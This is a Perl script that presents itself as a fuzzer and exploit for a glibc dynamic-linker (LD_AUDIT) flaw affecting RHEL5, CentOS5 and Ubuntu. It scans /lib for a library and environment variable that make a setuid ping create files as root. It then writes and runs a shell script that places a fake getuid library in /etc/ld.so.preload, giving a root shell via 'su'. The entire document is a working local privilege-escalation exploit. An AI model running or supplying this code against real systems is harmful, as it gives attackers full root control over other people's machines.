#!/usr/bin/perl
use POSIX;
$ptxt="
 [The GNU C library dynamic linker will dlopen arbitrary DSOs during setuid loads]
 [desc: Fuzz and exploit for RHEL5 / CentOS5 / Ubuntu]
";
print $ptxt;
our $old_fh=select(STDOUT); $|=1; select($old_fh);
@libdirs=("/lib"); # you can add your own paths to lib folder here
$tempdir="/tmp/fuzz/"; # temp directory
mkdir($tempdir);
#make some ascii
$total=0;
foreach $libdir (@libdirs) {
                opendir(my $dir, $libdir);
                @lf = readdir($dir);
                closedir $dir;
                $total=$total+scalar(@lf)-2;
}
$step=ceil($total/50);
$stepp=0;
print "0%"." "x6 ."20%"." "x6 ."40%"." "x6 ."60%"." "x6 ."80%"." "x6 ."100%\n";
print "\[";
foreach $libdir (@libdirs) {
                opendir(my $dir, $libdir);
                @libfiles = readdir($dir);
                closedir $dir;
                foreach $libfile (@libfiles) {
			       $stepp++;
			       if ($stepp==$step) {print ".";$stepp=0;}
                               if (($libfile ne ".") && ($libfile ne "..")) {
                                               @dump=`strings $libdir\/$libfile`;
                                               foreach $dline (@dump) {
                                                               if ($dline=~/^([A-Z\_0-9]+)$/) {
                                                                              chomp($dline);
                                                                              $ccc=`LD_AUDIT="$libfile" $dline="$tempdir$libfile-$dline" ping&>/dev/null`;
                                                               }
                                               }
                               }
                }
}
print "\]\n";
print "Fuzzing done. Thank you for using!\n";
opendir(my $dir, $tempdir);
@fuzzList = readdir($dir);
closedir $dir;
$libToExploit="";$argToExploit="";
if (scalar(@fuzzList)>2) {
	foreach $fuzzFile (@fuzzList) {
		if ($fuzzFile ne "." && $fuzzFile ne "..") {
			my ($lib,$param)=$fuzzFile=~/(.*)-(.*)/;
			print "Success: vuln lib - $lib ; arg - $param\n";
			if ((-e "$tempdir$fuzzFile") && (!-d "$tempdir$fuzzFile")) {
				$libToExploit=$lib;
				$argToExploit=$param;
			}
		}
	}
} else {
	print "Fail. No vuln libs found. Try another target ;)\n";
	exit();
}
$shCode=qq(#!/bin/sh
umask 0
LD_AUDIT=EXP_LIBRARY EXP_ARGUMENT=/etc/ld.so.preload ping
echo "[+] creating /tmp/getuid.so"
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -shared /tmp/getuid.c -o /tmp/getuid.so
echo "/tmp/getuid.so" > /etc/ld.so.preload
);
if ($libToExploit ne "" && $argToExploit ne "") {
	$shCode=~s/EXP_LIBRARY/$libToExploit/gi;
	$shCode=~s/EXP_ARGUMENT/$argToExploit/gi;
	open(SH,">spl.sh");
	print SH $shCode;
	close(SH);
	chmod(0755,"spl.sh");
	system("./spl.sh");
	print "Hehe.. Type 'su' and be awesome!\n";
}